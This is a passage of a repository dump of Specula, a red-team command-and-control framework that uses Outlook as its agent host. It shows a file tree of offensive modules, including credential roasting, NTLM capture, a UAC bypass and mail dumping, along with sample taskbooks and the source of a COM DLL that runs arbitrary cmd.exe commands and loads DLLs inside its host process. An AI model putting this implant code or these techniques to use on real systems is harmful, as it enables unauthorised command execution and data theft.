Repository: trustedsec/specula
Branch: main
Commit: 2b913314d10f
Files: 312
Total size: 560.7 KB
Directory structure:
gitextract_vdz89222/
├── .gitignore
├── CONTRIBUTING.md
├── README.md
├── Taskbooks/
│ ├── enum_installed_software.py
│ └── example.py
├── api/
│ ├── README.md
│ ├── SpeculaApi/
│ │ ├── Sepcula.cpp
│ │ ├── Sepcula.h
│ │ ├── Sepcula.rgs
│ │ ├── SpeculaApi.cpp
│ │ ├── SpeculaApi.def
│ │ ├── SpeculaApi.idl
│ │ ├── SpeculaApi.rc
│ │ ├── SpeculaApi.rgs
│ │ ├── SpeculaApi.vcxproj
│ │ ├── SpeculaApi.vcxproj.filters
│ │ ├── SpeculaApi_i.h
│ │ ├── SpeculaApips.def
│ │ ├── dllmain.cpp
│ │ ├── dllmain.h
│ │ ├── framework.h
│ │ ├── pch.cpp
│ │ ├── pch.h
│ │ ├── resource.h
│ │ └── targetver.h
│ ├── SpeculaApi.sln
│ └── SpeculaApiPS/
│ ├── SpeculaApiPS.vcxproj
│ └── SpeculaApiPS.vcxproj.filters
├── functions/
│ ├── api/
│ │ ├── install_api.py
│ │ ├── install_api.txt
│ │ ├── load_dll.py
│ │ ├── load_dll.txt
│ │ ├── remove_api.py
│ │ ├── remove_api.txt
│ │ ├── run_shell.py
│ │ ├── run_shell.txt
│ │ ├── verify_api.py
│ │ └── verify_api.txt
│ ├── enumerate/
│ │ ├── host/
│ │ │ ├── list_amsiproviders.py
│ │ │ ├── list_amsiproviders.txt
│ │ │ ├── list_applocker.py
│ │ │ ├── list_applocker.txt
│ │ │ ├── list_autoruns.py
│ │ │ ├── list_autoruns.txt
│ │ │ ├── list_basic.py
│ │ │ ├── list_basic.txt
│ │ │ ├── list_boottime.py
│ │ │ ├── list_boottime.txt
│ │ │ ├── list_clipboard.py
│ │ │ ├── list_clipboard.txt
│ │ │ ├── list_environmentvariables.py
│ │ │ ├── list_environmentvariables.txt
│ │ │ ├── list_gpp.py
│ │ │ ├── list_gpp.txt
│ │ │ ├── list_hostsfile.py
│ │ │ ├── list_hostsfile.txt
│ │ │ ├── list_hotfixes.py
│ │ │ ├── list_hotfixes.txt
│ │ │ ├── list_installedapps.py
│ │ │ ├── list_installedapps.txt
│ │ │ ├── list_installeddotnet.py
│ │ │ ├── list_installeddotnet.txt
│ │ │ ├── list_installedpowershell.py
│ │ │ ├── list_installedpowershell.txt
│ │ │ ├── list_iprouting.py
│ │ │ ├── list_iprouting.txt
│ │ │ ├── list_localadmins.py
│ │ │ ├── list_localadmins.txt
│ │ │ ├── list_localusers.py
│ │ │ ├── list_localusers.txt
│ │ │ ├── list_logging.py
│ │ │ ├── list_logging.txt
│ │ │ ├── list_mappeddrives.py
│ │ │ ├── list_mappeddrives.txt
│ │ │ ├── list_networkcardinfo.py
│ │ │ ├── list_networkcardinfo.txt
│ │ │ ├── list_networklogon.py
│ │ │ ├── list_networklogon.txt
│ │ │ ├── list_ntdomaininfo.py
│ │ │ ├── list_ntdomaininfo.txt
│ │ │ ├── list_officearch.py
│ │ │ ├── list_officearch.txt
│ │ │ ├── list_printers.py
│ │ │ ├── list_printers.txt
│ │ │ ├── list_processes.py
│ │ │ ├── list_processes.txt
│ │ │ ├── list_recentcommands.py
│ │ │ ├── list_recentcommands.txt
│ │ │ ├── list_recentfiles.py
│ │ │ ├── list_recentfiles.txt
│ │ │ ├── list_recyclebin.py
│ │ │ ├── list_recyclebin.txt
│ │ │ ├── list_scheduledtasks.py
│ │ │ ├── list_scheduledtasks.txt
│ │ │ ├── list_servicepermissions.py
│ │ │ ├── list_servicepermissions.txt
│ │ │ ├── list_services.py
│ │ │ ├── list_services.txt
│ │ │ ├── list_startmenu.py
│ │ │ ├── list_startmenu.txt
│ │ │ ├── list_timezone.py
│ │ │ ├── list_timezone.txt
│ │ │ ├── list_whoami.py
│ │ │ ├── list_whoami.txt
│ │ │ ├── list_windowsarch.py
│ │ │ ├── list_windowsarch.txt
│ │ │ ├── list_windowsversion.py
│ │ │ └── list_windowsversion.txt
│ │ └── ldap/
│ │ ├── ldap_query.py
│ │ ├── ldap_query.txt
│ │ ├── list_addcomputertodomain.py
│ │ ├── list_addcomputertodomain.txt
│ │ ├── list_asreproast.py
│ │ ├── list_asreproast.txt
│ │ ├── list_computer.py
│ │ ├── list_computer.txt
│ │ ├── list_computers.py
│ │ ├── list_computers.txt
│ │ ├── list_domaininfo.py
│ │ ├── list_domaininfo.txt
│ │ ├── list_lapspassword.py
│ │ ├── list_lapspassword.txt
│ │ ├── list_passwordnotrequired.py
│ │ ├── list_passwordnotrequired.txt
│ │ ├── list_passwordpolicy.py
│ │ ├── list_passwordpolicy.txt
│ │ ├── list_user.py
│ │ ├── list_user.txt
│ │ ├── list_users.py
│ │ └── list_users.txt
│ ├── execute/
│ │ └── host/
│ │ ├── application.py
│ │ ├── application.txt
│ │ ├── capture_netntlmv2.py
│ │ ├── capture_netntlmv2.txt
│ │ ├── cmd.py
│ │ ├── cmd.txt
│ │ ├── execute_excel4macro.py
│ │ ├── execute_excel4macro.txt
│ │ ├── execute_registerxll.py
│ │ ├── execute_registerxll.txt
│ │ ├── migrate_homepage.py
│ │ ├── migrate_homepage.txt
│ │ ├── remove_homepage.py
│ │ ├── remove_homepage.txt
│ │ ├── set_calendarhomepagehook.py
│ │ ├── set_calendarhomepagehook.txt
│ │ ├── spawnproc_explorer.py
│ │ ├── spawnproc_explorer.txt
│ │ ├── uac-sdclt.py
│ │ ├── uac-sdclt.txt
│ │ ├── wmi_execute.py
│ │ ├── wmi_execute.txt
│ │ ├── wmi_killprocname.py
│ │ ├── wmi_killprocname.txt
│ │ ├── wmi_killprocpid.py
│ │ ├── wmi_killprocpid.txt
│ │ ├── wscriptshell.py
│ │ └── wscriptshell.txt
│ ├── operation/
│ │ ├── file/
│ │ │ ├── cat_file.py
│ │ │ ├── cat_file.txt
│ │ │ ├── check_filearch.py
│ │ │ ├── check_filearch.txt
│ │ │ ├── check_fileexist.py
│ │ │ ├── check_fileexist.txt
│ │ │ ├── check_filehash.py
│ │ │ ├── check_filehash.txt
│ │ │ ├── copy_dir.py
│ │ │ ├── copy_dir.txt
│ │ │ ├── copy_file.py
│ │ │ ├── copy_file.txt
│ │ │ ├── create_dir.py
│ │ │ ├── create_dir.txt
│ │ │ ├── create_shortcut.py
│ │ │ ├── create_shortcut.txt
│ │ │ ├── delete_dir.py
│ │ │ ├── delete_dir.txt
│ │ │ ├── delete_file.py
│ │ │ ├── delete_file.txt
│ │ │ ├── download_filehttp.py
│ │ │ ├── download_filehttp.txt
│ │ │ ├── get_file.py
│ │ │ ├── get_file.txt
│ │ │ ├── list_acl.py
│ │ │ ├── list_acl.txt
│ │ │ ├── list_dir.py
│ │ │ ├── list_dir.txt
│ │ │ ├── list_shortcutinfo.py
│ │ │ ├── list_shortcutinfo.txt
│ │ │ ├── move_file.py
│ │ │ ├── move_file.txt
│ │ │ ├── put_file.py
│ │ │ ├── put_file.txt
│ │ │ ├── split_file.py
│ │ │ ├── split_file.txt
│ │ │ ├── zip_content.py
│ │ │ └── zip_content.txt
│ │ ├── network/
│ │ │ ├── netstat.py
│ │ │ ├── netstat.txt
│ │ │ ├── nslookup.py
│ │ │ └── nslookup.txt
│ │ ├── outlook/
│ │ │ ├── adjust_notifications.py
│ │ │ ├── adjust_notifications.txt
│ │ │ ├── change_outlookfolder.py
│ │ │ ├── change_outlookfolder.txt
│ │ │ ├── changeview_outlookfolder.py
│ │ │ ├── changeview_outlookfolder.txt
│ │ │ ├── delete_mail.py
│ │ │ ├── delete_mail.txt
│ │ │ ├── dump_gal.py
│ │ │ ├── dump_gal.txt
│ │ │ ├── get_emailaddress.py
│ │ │ ├── get_emailaddress.txt
│ │ │ ├── list_notifications.py
│ │ │ ├── list_notifications.txt
│ │ │ ├── list_overview.py
│ │ │ ├── list_overview.txt
│ │ │ ├── read_calendar.py
│ │ │ ├── read_calendar.txt
│ │ │ ├── read_contacts.py
│ │ │ ├── read_contacts.txt
│ │ │ ├── read_email.py
│ │ │ ├── read_email.txt
│ │ │ ├── read_emailnamedfolder.py
│ │ │ ├── read_emailnamedfolder.txt
│ │ │ ├── read_other.py
│ │ │ ├── read_other.txt
│ │ │ ├── savedraft_filemail.py
│ │ │ ├── savedraft_filemail.txt
│ │ │ ├── search_email.py
│ │ │ ├── search_email.txt
│ │ │ ├── send_mail.py
│ │ │ ├── send_mail.txt
│ │ │ ├── sendfile_mail.py
│ │ │ ├── sendfile_mail.txt
│ │ │ ├── stop_outlook.py
│ │ │ └── stop_outlook.txt
│ │ ├── registry/
│ │ │ ├── delkeyhkcuregistry.py
│ │ │ ├── delkeyhkcuregistry.txt
│ │ │ ├── delvaluehkcuregistry.py
│ │ │ ├── delvaluehkcuregistry.txt
│ │ │ ├── getallkeysregistry.py
│ │ │ ├── getallkeysregistry.txt
│ │ │ ├── getallvaluesregistry.py
│ │ │ ├── getallvaluesregistry.txt
│ │ │ ├── getvalueregistry.py
│ │ │ ├── getvalueregistry.txt
│ │ │ ├── setvaluehkcuregistry.py
│ │ │ └── setvaluehkcuregistry.txt
│ │ └── specula/
│ │ ├── remove_allowlongscriptruntime.py
│ │ ├── remove_allowlongscriptruntime.txt
│ │ ├── set_allowlongscriptruntime.py
│ │ └── set_allowlongscriptruntime.txt
│ └── trolling/
│ ├── play_voice.py
│ ├── play_voice.txt
│ ├── set_clipboard.py
│ └── set_clipboard.txt
├── helperFunctions/
│ ├── Delregkey_hkcu.txt
│ ├── Delregvalue_hkcu.txt
│ ├── Getallregkeys.txt
│ ├── Getallregvalues.txt
│ ├── Getregvalue.txt
│ ├── HexToBytes.txt
│ ├── Setregvalue_hkcu.txt
│ ├── base64.txt
│ ├── base_template.txt
│ ├── createstream.txt
│ ├── dir_creator.txt
│ ├── dir_lister.txt
│ └── supportFuncs.txt
├── hiddenFunctions/
│ ├── downloadGAL.py
│ ├── downloadGAL.txt
│ ├── download_file.py
│ ├── download_file.txt
│ ├── upload_file.py
│ └── upload_file.txt
├── hooker_generator.py
├── lib/
│ ├── core/
│ │ ├── helpers.py
│ │ ├── setup.py
│ │ ├── specagents.py
│ │ ├── specmodule.py
│ │ ├── specpayload.py
│ │ ├── spectaskbook.py
│ │ ├── utility.py
│ │ └── utils.py
│ ├── handlers/
│ │ ├── base.html
│ │ ├── blacklist.html
│ │ ├── dev_blank.html
│ │ ├── dev_encrypted_task_template.html
│ │ ├── dev_unencrypted_task_template.html
│ │ ├── redirect_template.html
│ │ ├── specapplication.py
│ │ ├── speccomms.py
│ │ ├── specdevcomms.py
│ │ ├── specpayload.py
│ │ ├── specvalidate.py
│ │ └── validation.html
│ ├── menu/
│ │ ├── specpromptdbedit.py
│ │ ├── specpromptexplorer.py
│ │ ├── specpromptinteract.py
│ │ ├── specpromptmodule.py
│ │ ├── specpromptpayload.py
│ │ ├── specpromptprestage.py
│ │ └── specpromptpushover.py
│ ├── modhandlers/
│ │ └── generic.py
│ ├── tab_completers/
│ │ └── generic.py
│ └── validators/
│ ├── files.py
│ └── generic.py
├── release_history.txt
├── requirements.txt
├── specula.py
└── ssl/
├── ssl-cert-snakeoil.key
└── ssl-cert-snakeoil.pem
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
*.db
configoptions.py
specConfig.ini
DefaultBlacklist.txt
.vscode/
specula_log.txt
weblog.log
operator_log.txt
agent_data/
payloadhosting/
venv/
*.pyc
================================================
FILE: CONTRIBUTING.md
================================================
# Contributions
If you are considering contributing to our repository, first, thank you for doing so! </br>
Contributions from community members are more than welcome, but there are a few items that you should be aware of for a smooth process. </br>
At this time we will not be accepting new functional changes to the provided COM object. If you find an error in the
existing code we will accept a pull to fix that within the COM object.
## Technique Expectations
* Capabilities should run without causing outlook.exe to lock up.
* Capabilities should account for errors that may occur and handle them
## Code Expectations
* Python code should work on versions 3.9 through 3.11
* Any additions to helperFunctions should be well-formed and usable from other vbs scripts
* Removal of intentionally placed IOCs will be rejected
* Again any updates to code under api/* should be error correcting in nature only, not feature additions.
## What to expect as a contributor
After your contribution is received, it will receive an in-depth code review and testing. </br>
After testing is completed, we will have zero or more rounds of change requests based on findings until there are no issues in the code. At that point it will be accepted into the repository, and your github username will be added to our credit list (if you would prefer not to be added or some other handle to be used, just let me know)
================================================
FILE: README.md
================================================
Getting started info and information for developing your own modules is available on the [wiki](https://github.com/trustedsec/specula/wiki)
================================================
FILE: Taskbooks/enum_installed_software.py
================================================
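def TaskBook(helpers, agent):
    """Queue three software-inventory tasks for ``agent``.

    Two ``operation/file/list_dir`` tasks are inserted, one per Program Files
    directory, followed by one ``enumerate/host/list_installedapps`` task.
    Everything goes through the ``helpers`` object supplied by the caller
    (``get_module``, ``setModOption``, ``insertTask``).

    Args:
        helpers: object providing ``get_module``, ``setModOption`` and
            ``insertTask``.
        agent: the agent the tasks are inserted for; passed through unchanged.
    """
    # Options shared by both list_dir tasks, in the order they are applied.
    # All values are strings, exactly as the module options are set elsewhere
    # in this file.
    list_dir_options = (
        ('recurselevels', "0"),
        ('depth', "0"),
        ('filetype', "*"),
        ('filename', "*"),
        ('nodirectories', "False"),
        ('sizeformat', "mb"),
        ('nofiles', "True"),
        ('output_console', "False"),
    )

    # Raw strings: "\P" is not a valid escape sequence, so the plain literal
    # only works by accident and triggers an invalid-escape warning on newer
    # interpreters. The runtime value is unchanged.
    for directory in (r"c:\Program Files", r"c:\Program Files (x86)"):
        # A fresh module object is fetched per task so option values are not
        # shared between the two directory listings.
        mod = helpers.get_module('operation/file/list_dir')
        helpers.setModOption(mod, 'directory', optval=directory)
        for option, value in list_dir_options:
            helpers.setModOption(mod, option, optval=value)
        helpers.insertTask(agent, mod, 'operation/file/list_dir')

    # This module is inserted without setting any options.
    mod = helpers.get_module('enumerate/host/list_installedapps')
    helpers.insertTask(agent, mod, 'enumerate/host/list_installedapps')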
================================================
FILE: Taskbooks/example.py
================================================
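def TaskBook(helpers, agent):
    """Example taskbook showing the three ways a module can be queued.

    Inserts, in order: a module that takes no options, a module whose option
    is collected from the operator through a prompt, and a module whose option
    is given a fixed value.

    Args:
        helpers: object providing ``get_module``, ``setModOption`` and
            ``insertTask``.
        agent: the agent the tasks are inserted for; passed through unchanged.
    """
    # This module doesn't take arguments, so none are set.
    mod = helpers.get_module('enumerate/host/list_applocker')
    helpers.insertTask(agent, mod, 'enumerate/host/list_applocker')

    # This module does take an argument; the operator is prompted for it.
    mod = helpers.get_module('execute/host/cmd')
    helpers.setModOption(mod, 'command', prompt="What command would you like to run: ")
    helpers.insertTask(agent, mod, 'execute/host/cmd')

    # An option can also be given a fixed value instead of prompting.
    # NOTE(review): the repository tree lists operation/file/list_dir, and
    # Taskbooks/enum_installed_software.py sets 'directory' rather than
    # 'strpath' -- confirm this module path and option name still exist.
    mod = helpers.get_module('operation/file/listdir')
    # Raw string: "\W" is not a valid escape sequence; the value is unchanged.
    helpers.setModOption(mod, 'strpath', optval=r"C:\Windows")
    helpers.insertTask(agent, mod, 'operation/file/listdir')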
================================================
FILE: api/README.md
================================================
# SpeculaApi
================================================
FILE: api/SpeculaApi/Sepcula.cpp
================================================
// Sepcula.cpp : Implementation of CSepcula
#include "pch.h"
#include "Sepcula.h"
#define BUFFERSIZE 4096
// CSepcula
// Runs `cmd` through the command interpreter and returns its combined
// stdout/stderr text in `result`.
//
// cmd     - text appended, unvalidated, to CmdProg (declared in Sepcula.h as
//           "C:\Windows\system32\cmd.exe /c ").
// timeout - number of one-second wait iterations when the VARIANT is VT_I4;
//           any other variant type falls back to 60.
// result  - receives the captured output, or the fixed error string when the
//           pipe or process could not be created.
//
// Returns S_OK on both the normal and the timed-out path; a Win32-derived
// HRESULT only when CreatePipe, SetHandleInformation or CreateProcessW fails.
//
// Detection-relevant: every successful call creates a
// "C:\Windows\system32\cmd.exe /c ..." child of whichever process hosts this
// COM object, with handle inheritance enabled.
STDMETHODIMP_(HRESULT __stdcall) CSepcula::RunShell(BSTR cmd, VARIANT timeout, BSTR * result)
{
CComBSTR errmsg{ L"Failed to run shell command" };
HRESULT hret = S_OK;
char outputbuffer[BUFFERSIZE];
CComBSTR totaloutput{};
DWORD availBytes = 0;
// Pipe handles are created inheritable so the child can write to the pipe.
SECURITY_ATTRIBUTES saAttr;
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
HANDLE hChildStd_OUT_Rd = NULL;
HANDLE hChildStd_OUT_Wr = NULL;
// Create a pipe for the child process's STDOUT.
if (!CreatePipe(&hChildStd_OUT_Rd, &hChildStd_OUT_Wr, &saAttr, 0))
{
hret = HRESULT_FROM_WIN32(GetLastError());
errmsg.CopyTo(result);
return hret;
}
// Ensure the read handle to the pipe for STDOUT is not inherited.
if (!SetHandleInformation(hChildStd_OUT_Rd, HANDLE_FLAG_INHERIT, 0))
{
// NOTE(review): GetLastError() is read after the two CloseHandle calls, so the
// returned code may no longer be the SetHandleInformation failure -- confirm
// and capture the error first.
CloseHandle(hChildStd_OUT_Rd);
CloseHandle(hChildStd_OUT_Wr);
hret = HRESULT_FROM_WIN32(GetLastError());
errmsg.CopyTo(result);
return hret;
}
// Both stdout and stderr of the child are pointed at the pipe's write end;
// stdin is left unset.
STARTUPINFO siStartInfo;
ZeroMemory(&siStartInfo, sizeof(STARTUPINFO));
siStartInfo.cb = sizeof(STARTUPINFO);
siStartInfo.hStdError = hChildStd_OUT_Wr;
siStartInfo.hStdOutput = hChildStd_OUT_Wr;
siStartInfo.dwFlags |= STARTF_USESTDHANDLES;
PROCESS_INFORMATION piProcInfo;
ZeroMemory(&piProcInfo, sizeof(PROCESS_INFORMATION));
// Full command line = fixed interpreter prefix + caller-supplied text.
CComBSTR fullcmd{ CmdProg };
fullcmd.Append(cmd);
// Create the child process.
if (!CreateProcessW(NULL,
fullcmd, // command line
NULL, // process security attributes
NULL, // primary thread security attributes
TRUE, // handles are inherited
0, // creation flags
NULL, // use parent's environment
NULL, // use parent's current directory
&siStartInfo, // STARTUPINFO pointer
&piProcInfo)) // receives PROCESS_INFORMATION
{
hret = HRESULT_FROM_WIN32(GetLastError());
errmsg.CopyTo(result);
CloseHandle(hChildStd_OUT_Rd);
CloseHandle(hChildStd_OUT_Wr);
return hret;
}
// NOTE(review): the type check is for VT_I4 but the value is read from iVal,
// the 16-bit member; VT_I4 data lives in lVal, so larger values are presumably
// truncated -- confirm.
DWORD iterations = (timeout.vt == VT_I4) ? timeout.iVal : 60;
// Poll once per second (1000 ms wait) until the child exits or the iteration
// budget is used up, draining whatever the pipe holds after each timed-out wait.
while (WaitForSingleObject(piProcInfo.hProcess, 1000) == WAIT_TIMEOUT && iterations)
{
availBytes = 0;
PeekNamedPipe(hChildStd_OUT_Rd, NULL, 0, NULL, &availBytes, NULL);
while (availBytes)
{
ZeroMemory(outputbuffer, sizeof(outputbuffer));
// NOTE(review): thisread is computed but never used; ReadFile below asks for
// BUFFERSIZE bytes into a BUFFERSIZE-byte buffer. A full read leaves no
// terminating NUL for Append(), which takes the buffer as a C string, and a
// read larger than availBytes would wrap the unsigned subtraction.
DWORD thisread = (availBytes >= BUFFERSIZE) ? BUFFERSIZE : availBytes;
DWORD read = 0;
// NOTE(review): the ReadFile result is not checked; if it fails with read == 0,
// availBytes never decreases and this loop does not terminate.
ReadFile(hChildStd_OUT_Rd, (char*)outputbuffer, BUFFERSIZE, &read, NULL);
totaloutput.Append(outputbuffer);
availBytes -= read;
}
iterations--;
}
if (iterations == 0)
{
// Timed-out path: a marker is appended and the function returns what was
// collected so far. No call here terminates the child, and output still in
// the pipe is not drained on this path.
totaloutput.Append(L"\n\nProcess wait timed out");
}
else
{
// Child exited within the budget: drain the remaining pipe contents.
// The same buffer-handling notes as in the polling loop apply here.
availBytes = 0;
PeekNamedPipe(hChildStd_OUT_Rd, NULL, 0, NULL, &availBytes, NULL);
while (availBytes)
{
ZeroMemory(outputbuffer, sizeof(outputbuffer));
DWORD thisread = (availBytes >= BUFFERSIZE) ? BUFFERSIZE : availBytes;
DWORD read = 0;
ReadFile(hChildStd_OUT_Rd, (char*)outputbuffer, BUFFERSIZE, &read, NULL);
totaloutput.Append(outputbuffer);
availBytes -= read;
}
}
totaloutput.CopyTo(result);
// NOTE(review): only the pipe handles are closed; piProcInfo.hProcess and
// piProcInfo.hThread are never closed in this function, so each call leaks
// two handles in the host process.
CloseHandle(hChildStd_OUT_Rd);
CloseHandle(hChildStd_OUT_Wr);
return hret;
}
// Loads the library at `path` into the process hosting this COM object.
//
// path    - passed unchanged to LoadLibraryW.
// persist - when false, the module is released again with FreeLibrary right
//           after a successful load; when true it stays loaded.
// status  - set to true only when LoadLibraryW succeeded.
//
// Returns S_OK on success, otherwise the HRESULT form of GetLastError().
STDMETHODIMP_(HRESULT __stdcall) CSepcula::LoadDll(BSTR path, boolean persist, boolean* status)
{
    HMODULE loaded = LoadLibraryW(path);

    // The out-parameter is written only after the load attempt, as a plain
    // store, so the last-error value from LoadLibraryW is still intact below.
    *status = false;

    if (loaded != nullptr)
    {
        if (!persist)
        {
            FreeLibrary(loaded);
        }
        *status = true;
        return S_OK;
    }

    return HRESULT_FROM_WIN32(GetLastError());
}
================================================
FILE: api/SpeculaApi/Sepcula.h
================================================
// Sepcula.h : Declaration of the CSepcula
#pragma once
#include "resource.h" // main symbols
#include "SpeculaApi_i.h"
using namespace ATL;
// CSepcula
// ATL COM class behind CLSID_Sepcula. It implements ISepcula through
// IDispatchImpl (type library LIBID_SpeculaApiLib, version 1.0) and uses the
// multi-threaded ATL root (CComMultiThreadModel).
class ATL_NO_VTABLE CSepcula :
public CComObjectRootEx<CComMultiThreadModel>,
public CComCoClass<CSepcula, &CLSID_Sepcula>,
public IDispatchImpl<ISepcula, &IID_ISepcula, &LIBID_SpeculaApiLib, /*wMajor =*/ 1, /*wMinor =*/ 0>
{
public:
// No per-instance state to initialise beyond the CmdProg default below.
CSepcula()
{
}
// Registration script resource for this class (see Sepcula.rgs).
DECLARE_REGISTRY_RESOURCEID(IDR_SEPCULA)
// Interfaces handed out by QueryInterface: the custom interface and IDispatch.
BEGIN_COM_MAP(CSepcula)
COM_INTERFACE_ENTRY(ISepcula)
COM_INTERFACE_ENTRY(IDispatch)
END_COM_MAP()
DECLARE_PROTECT_FINAL_CONSTRUCT()
// Nothing to set up after construction; always succeeds.
HRESULT FinalConstruct()
{
return S_OK;
}
// Nothing to tear down.
void FinalRelease()
{
}
public:
// Runs `cmd` via the command interpreter and returns its output text;
// implemented in Sepcula.cpp.
STDMETHOD(RunShell)(BSTR cmd, VARIANT timeout, BSTR * result);
// Loads the library at `path` into the hosting process; implemented in
// Sepcula.cpp.
STDMETHOD(LoadDll)(BSTR path, boolean persist, boolean* status);
private:
// Fixed prefix that RunShell puts in front of the caller-supplied command
// text; the interpreter path is hard-coded rather than resolved at run time.
CComBSTR CmdProg{L"C:\\Windows\\system32\\cmd.exe /c "};
};
OBJECT_ENTRY_AUTO(__uuidof(Sepcula), CSepcula)
================================================
FILE: api/SpeculaApi/Sepcula.rgs
================================================
HKCR
{
SpeculaApi.Specula.1 = s 'Specula class'
{
CLSID = s '{e8b55279-c6b4-48f3-8138-b727337c0236}'
}
SpeculaApi.Specula = s 'Specula class'
{
CurVer = s 'SpeculaApi.Specula.1'
}
NoRemove CLSID
{
ForceRemove {e8b55279-c6b4-48f3-8138-b727337c0236} = s 'Specula class'
{
ProgID = s 'SpeculaApi.Specula.1'
VersionIndependentProgID = s 'SpeculaApi.Specula'
ForceRemove Programmable
InprocServer32 = s '%MODULE%'
{
val ThreadingModel = s 'Free'
}
TypeLib = s '{5be8ef76-6253-482a-926e-d1d877de3b63}'
Version = s '1.0'
}
}
}
================================================
FILE: api/SpeculaApi/SpeculaApi.cpp
================================================
// SpeculaApi.cpp : Implementation of DLL Exports.
#include "pch.h"
#include "framework.h"
#include "resource.h"
#include "SpeculaApi_i.h"
#include "dllmain.h"
using namespace ATL;
// Tells COM whether this DLL may be unloaded; the decision is delegated to
// the ATL module object.
_Use_decl_annotations_
STDAPI DllCanUnloadNow(void)
{
    const HRESULT unloadState = _AtlModule.DllCanUnloadNow();
    return unloadState;
}
// Hands COM the class factory for `rclsid`, asking for interface `riid`;
// the lookup is delegated to the ATL module object and the result is stored
// in *ppv.
_Use_decl_annotations_
STDAPI DllGetClassObject(_In_ REFCLSID rclsid, _In_ REFIID riid, _Outptr_ LPVOID* ppv)
{
    const HRESULT factoryResult = _AtlModule.DllGetClassObject(rclsid, riid, ppv);
    return factoryResult;
}
// DllRegisterServer - writes this module's COM registration to the registry.
// The ATL module registers the object, the type library and all interfaces
// in the type library.
_Use_decl_annotations_
STDAPI DllRegisterServer(void)
{
    return _AtlModule.DllRegisterServer();
}
// DllUnregisterServer - removes this module's COM registration from the
// registry by delegating to the ATL module object.
_Use_decl_annotations_
STDAPI DllUnregisterServer(void)
{
    return _AtlModule.DllUnregisterServer();
}
// DllInstall - registers (bInstall != 0) or unregisters (bInstall == 0) the
// module, optionally per user instead of per machine.
//
// pszCmdLine - optional switch; per-user registration is selected only when
//              it equals "user" (compared case-insensitively).
//
// Returns the HRESULT of the register or unregister call. A failed
// registration is rolled back by calling DllUnregisterServer, and the
// original failure code is still returned.
STDAPI DllInstall(BOOL bInstall, _In_opt_ LPCWSTR pszCmdLine)
{
    static const wchar_t szUserSwitch[] = L"user";

    // _countof counts the terminating NUL, so the comparison covers the whole
    // switch including its end: "user" matches, "username" does not.
    const bool perUserRequested =
        pszCmdLine != nullptr &&
        _wcsnicmp(pszCmdLine, szUserSwitch, _countof(szUserSwitch)) == 0;
    if (perUserRequested)
    {
        ATL::AtlSetPerUserRegistration(true);
    }

    if (!bInstall)
    {
        return DllUnregisterServer();
    }

    HRESULT hr = DllRegisterServer();
    if (FAILED(hr))
    {
        // Best-effort cleanup of a partial registration; its result is ignored.
        DllUnregisterServer();
    }
    return hr;
}
================================================
FILE: api/SpeculaApi/SpeculaApi.def
================================================
; SpeculaApi.def : Declares the module parameters.
LIBRARY
EXPORTS
DllCanUnloadNow PRIVATE
DllGetClassObject PRIVATE
DllRegisterServer PRIVATE
DllUnregisterServer PRIVATE
DllInstall PRIVATE
================================================
FILE: api/SpeculaApi/SpeculaApi.idl
================================================
// SpeculaApi.idl : IDL source for SpeculaApi
//
// This file will be processed by the MIDL tool to
// produce the type library (SpeculaApi.tlb) and marshalling code.
import "oaidl.idl";
import "ocidl.idl";
// ISepcula: dual (vtable + IDispatch) automation interface exposing the two
// operations implemented by CSepcula in Sepcula.cpp.
[
object,
uuid(b0f5f947-8064-48f7-a623-5c058dc91cc8),
dual,
nonextensible,
pointer_default(unique)
]
interface ISepcula : IDispatch
{
// DISPID 1: runs `cmd` and returns the captured output text. `timeout` is
// optional; the implementation falls back to 60 when it is not a VT_I4.
[id(1)] HRESULT RunShell([in] BSTR cmd, [in, optional] VARIANT timeout, [out, retval] BSTR* result);
// DISPID 2: loads the library at `path`; `persist` selects whether it stays
// loaded. The return value reports whether the load succeeded.
[id(2)] HRESULT LoadDll([in] BSTR path, [in] boolean persist, [out, retval] boolean* status);
};
// Type library for the API. Its uuid is the same GUID that Sepcula.rgs writes
// as the class's TypeLib value.
[
uuid(5be8ef76-6253-482a-926e-d1d877de3b63),
version(1.0),
]
library SpeculaApiLib
{
importlib("stdole2.tlb");
// The coclass uuid is the CLSID that Sepcula.rgs registers under HKCR\CLSID
// with ProgID SpeculaApi.Specula.1, so it identifies an installed copy.
[
uuid(e8b55279-c6b4-48f3-8138-b727337c0236)
]
coclass Sepcula
{
[default] interface ISepcula;
};
};
import "shobjidl.idl";
================================================
FILE: api/SpeculaApi/SpeculaApi.rgs
================================================
HKCR
{
}
================================================
FILE: api/SpeculaApi/SpeculaApi.vcxproj
================================================
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<VCProjectVersion>17.0</VCProjectVersion>
<ProjectGuid>{AF2D318C-2C5A-4C9D-BE4C-AA5B3E8037DB}</ProjectGuid>
<Keyword>AtlProj</Keyword>
<WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>DynamicLibrary</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<PlatformToolset>v143</PlatformToolset>
